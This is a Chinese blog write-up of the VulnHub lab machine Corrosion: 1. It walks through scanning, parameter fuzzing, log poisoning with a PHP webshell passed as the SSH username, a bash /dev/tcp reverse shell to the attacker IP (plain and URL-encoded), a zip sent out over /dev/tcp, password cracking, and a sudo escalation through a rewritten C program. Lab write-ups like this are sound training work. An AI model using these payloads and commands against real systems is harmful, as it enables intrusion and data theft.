每周打靶练习之CORROSION: 1

于 2024-03-12 12:49:07 发布
阅读量1.1k 收藏 27
点赞数 10
分类专栏: 靶机渗透测试 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chhsbsjs/article/details/136648862
版权

先将靶机导入到我们的VMware里面,然后开启NAT模式。

我们使用我们的kali,打开终端输入arp-scan -l查看其他存活的主机,发现192.168.13.143为我们的靶机IP

接下来使用nmap对目标IP进行详细的扫描,nmap -A 192.168.13.143发现开启22端口和80端口

接下来去访问143的80端口,查看源码之后也没有什么发现,就是简单的apache的配置

接下来对目录进行一个扫描爆破,使用dirmap没有扫出目录,我们切换其他的扫描器gobuster,gobuster dir -u http://192.168.13.143/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip

发现了/task目录和/blog-post目录,访问一下http://192.168.13.143/tasks/有一个文件

打开发现是几行字,写着要我们完成任务

# 需要完成的任务

1. 更改身份验证日志的权限

2. 更改端口 22 -> 7672

3. 设置phpMyAdmin

接下来去访问另外一个目录http://192.168.13.143/blog-post/

最后的randy应该是我们的用户名,刚刚开启靶机的时候也是这个名字,源码里面也没有有用的东西,继续二级目录挖掘一下,gobuster dir -u http://192.168.13.143/blog-post/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip

发现还有两个目录分别为/archives和/uploads目录,接下来去访问一下/archives发现有一个php文件randylogs.php

但是访问却是什么都没有显示,可能需要执行什么参数

所以接下来我们使用ffuf去进行一个模糊测试参数,ffuf -c -w /usr/share/wordlists/dirb/big.txt -u 'http://192.168.13.143/blog-post/archives/randylogs.php?FUZZ=/etc/passwd' -fs 0

发现就是file这个参数,查看一下可以执行命令

通过之前的提示我们能知道要我们更改日志权限,尝试包含ssh日志文件/var/log/auth.log

我们通过ssh登录尝试一下看看是否可以更新到日志里面。

可以看到能够有结果记录到日志里面来,然后我们尝试包含一句话木马上去

只需将用户名跟更改为一句话木马即可。

ssh ‘<?php system($_REQUEST['cmd']);?>’@192.168.13.143

看看命令有没有执行成功,192.168.13.143/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=ifconfig

执行成功了,接下来用nc反弹一下shell

echo "bash -i >& /dev/tcp/192.168.13.128/7777 0>&1" | bash

要先将上面这一个反弹代码url编码

echo%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.13.128%2F7777%200%3E%261%22%20%7C%20bash

成功将shell反弹回来,sudo -l 看看有没有可以执行sudo的文件也没有,隐藏文件有个randylogs.php

接下来进行权限提升,find / -perm -u=s -type f 2>/dev/null,利用find命令查找拥有suid权限的文件也没有什么可以利用的

然后翻文件,在/var目录找到一个user_backup.zip的文件

利用nc将文件传输回来cat user_backup.zip >/dev/tcp/192.168.13.128/2222

这里的IP是输kali的IP

回来之后解压一下zip文件发现需要密码,那就要爆破一下zip的密码了

使用命令fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u user_backup.zip

发现密码为!randybaby,然后继续解压user_backup.zip

这里有四个文件,分别为ssh的私钥和公钥,然后是密码和一个c文件,打开密码为:randylovesgoldfish1998

进入/home目录发现只有randy一个用户,那这个密码就是randy用户的了

Ssh登录一下Randy用户

当前目录下拿到第一个flag

接下来要提权拿到第二个flag

利用sudo -l命令查看可调用root权限执行的文件

刚刚我们看见了一个同样名字的c文件,我们去查看一下

#include<unistd.h>

void main()

{ setuid(0); // 设置 userid 为0 即为最高权限(root)

  setgid(0); // 设置 groupid 为0 即为最高权限(root)

  system("/usr/bin/date"); // 执行命令

  system("cat /etc/hosts"); // 执行命令

  system("/usr/bin/uname -a"); // 执行命令

}

这本身就是一个执行命令的代码,利用ssh命令上传本地文件

scp -r ./easysysinfo.c randy@192.168.13.143:/home/randy

上传上去了,修改一下代码为

#include "unistd.h"

#include "stdlib.h"

void main()

{

        setuid(0);

        setgid(0);

        system("bash -i");

}

利用gcc编译执行一下,成功提权到root用户。

进入root用户拿到最后的flag。

总结:

  1. ffuf的使用
  2. Ssh日志包含木马(/var/log/auth.log)
  3. Nc反弹shell命令(需要url加密)
  4. Zip加密破解(fcrack)
  5. Sudo提权
ChefY30
关注
专栏目录
VulnHub靶场-Corrosion:1
hxync的博客
08-14 692
靶场下载地址:Corrosion:1 下载好之后导入virtualbox启动 Kali IP地址: Nmap扫描靶机IP: Nmap扫端口: 浏览器访问80端口: 没发现什么有用的信息 Dirbuster扫目录: 访问一下扫到的内容,发现了txt文件里似乎有提示信息 推测是在登录日志中可能存在文件包含 Fuzz找下参数: ssh登录尝试一下: 发现确实存在文件包含,上传一句话木马: 命令执行成功: 反弹shell 先监听端口 url编码: 成功拿到shell 在/var/ba
腐蚀matlab代码-Corrosion:用塔菲尔外推法计算腐蚀速率
05-22
在提供的"Corrosion-master"压缩包中,可能包含了实现这些步骤的Matlab源代码,如数据读取、预处理、图形绘制、曲线拟合和结果计算等函数。通过阅读和理解这些代码,可以学习到如何在实际项目中应用塔菲尔外推法进行...
看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:1
Aluxian_的博客
06-24 1965
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Easy。
看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2
Aluxian_的博客
06-26 1276
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Medium这个靶机难度中偏上 因为比较麻烦1.信息收集获取ip地址 和端口信息web等 查看F12源码信息2.文件包含漏洞,包含日志文件ssh写入木马ssh ''@靶机(新知识点!3.nc反弹shell(这里要使用url编码)zip2john爆破和fcrackzip。
corrosion 靶机(ffuf模糊测试,命令执行)
m0_66299232的博客
01-13 932
4.因为22端口开放,又有文件泄露漏洞,那么就可以利用22端口把木马写入auth.log文件里,造成命令执行。4.下载下来后,进行解压不成功需要密码,使用fcrackzip进行破解密码。2.访问网页1发现/archives下面有俩个文件,访问后有一个php文件。1.由于没有找到可利用信息,将linpeas.sh下载下来,进行探测。2.找到一个user_backup.zip文件,应该是一个用户的备份!3.既然这个命令是三个小命令合起来的 ,那么就有三种提权方法!6.开启监听,执行命令,反弹shell成功。
Vulnhub靶机:Corrosion1
qq_48904485的博客
01-09 536
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:corrosion:1(10.0.2.12)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/corrosion-1,730/
靶场:CORROSION 1 攻击流程
qq_51950323的博客
05-08 328
写一个用来提权的easysysinfo.c文件,编译到/home/randy/tools/easysysinfo中,利用sudo执行成功提权。确认可以利用后,写bash脚本反弹shell,先在本机监听端口。在/var/backups目录下找个一个疑似账户备份的压缩包。得到了file参数,将参数值设为日志文件目录,尝试访问日志。再扫描blog-post的目录下发现一个php文件。尝试在ssh连接时写入php代码到日志文件中。打开php文件,需要一个参数,根据提示。访问一下扫到的内容,发现了。
corrosion:Eclipse Corrosion-Eclipse IDE中的Rust版本
05-04
Corrosion是Eclipse IDE的Rust开发插件,通过与Rust Analyzer语言服务器,CargoRunner和gdb调试器集成,提供了丰富的版本体验。 下载/安装 腐蚀 从成熟的Eclipse IDE进行Rust开发。 或者 在您的计算机上正确安装了...
Corrosion current Tafel - Matlab (1)_腐蚀_corrosion_金属腐蚀_随机大小圆的生成_
09-29
标题中的“Corrosion current Tafel - Matlab (1)”提到了腐蚀电流和Tafel曲线,这在金属腐蚀研究中是非常重要的概念。Tafel曲线是描述电化学腐蚀过程中阴极和阳极反应速率与电位关系的图表,通过分析Tafel曲线,...
46244-130838-1-SM_corrosion_
09-29
1. **目视检查**:这是最基础也是最直观的腐蚀检测方法,通过肉眼观察设备表面的锈蚀、颜色变化或裂纹等迹象。虽然简单易行,但其局限在于只能发现裸露的腐蚀痕迹,难以探测内部或隐蔽部位的腐蚀情况。 2. **测厚仪...
vulnhub靶机-Corrosion
臭nana的博客
08-16 779
1、找到靶机ip:192.168.162.131 nmap -sn 192.168.162.0/24 2、扫描靶机端口,发现开放22和80端口 ┌──(root????cracer)-[~] └─# nmap -A -p- 192.168.162.131 Starting Nmap 7.91 ( https://nmap.org ) Nmap scan report for 192.168.162.131 Host is up (0.00067s latency).
靶机渗透练习36-Corrosion
hirak0的博客
04-18 543
靶机描述 靶机地址:https://www.vulnhub.com/entry/corrosion-1,730/ Description Difficulty: Easy A easy box for beginners, but not too easy. Good Luck. Hint: Enumerate Property. 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.146 注:靶机与Kali的IP地址只需要在同
Vulnhub_Corrosion2靶机渗透测试
m0_66225311的博客
09-17 246
该靶机难度感觉不算大,查看好靶机给的提示,枚举是关键,在爆破压缩包,爆破randy用户密码的时候都有用到新版本的框架,多半已经修复了之前的漏洞,登陆到后台后先查看一下版本信息,搜索一下当前版本是否有漏洞收集好发现的的账号密码,一些提示性的界面,都会有所帮助本次提权使用到的是polkit提权,执行命令调用helper来执行/bin/bash获得root权限。
Vulnhub靶机:Corrosion 2
最新发布
qq_48904485的博客
01-10 1013
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:corrosion:2(10.0.2.13)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/corrosion-2,745/
Corrosion2 靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
10-31 915
Corrosion2 靶场渗透记录~ 提权太难懂~~~~~~
Vulnhub: Corrosion靶机
qq_43884092的博客
06-21 939
文件包含ssh日志getshell,替换程序配合sudo提权
vulnhub靶场——CORROSION:1
Czheisenberg的博客
02-16 2099
准备 攻击机:kali 靶机: CORROSION: 1 NAT 192.168.91.0 网段 下载连接: https://www.vulnhub.com/entry/corrosion-1,730/ 信息搜集与利用 主机发现 python3 ping.py -H 192.168.91.0/24 如图所示得到目标靶机IP地址: 192.168.91.188 端口扫描 如图所示只开放了 22,80 两个端口。 HTTP http://192.168.91.188/ 目录扫描 挨个访问上面的路径:
【VULNHUB靶机】Corrosion: 1
travelnight的博客
03-23 3480
在家隔离,好久没玩靶机了,现在来整一个。
Corrosion2( 侵蚀)靶机
m0_66299232的博客
10-02 589
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip //解出文件密码。sudo /usr/bin/python3.8 /home/randy/randombase64.py //执行之后就会触发写入的提权脚本;5.sudo -l 发现一个.py文件有权限,查看.py文件后发现,他一直调用base64。2.gzip -d rockyou.txt.gz //解压字典里的密码文件。虚拟机网络链接模式:桥接模式。将文件下载下来进行解压!
PCB基础知识详解:关键术语与工艺
1. A/W (Artwork) 底片:在制作PCB过程中,用于光刻工艺的精确图形模板。 2. Ablation:指通过激光或切割等方式去除材料的过程。 3. Abrasion resistance:耐磨性,衡量材料表面抵抗磨损的能力。 4. Absorption:...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值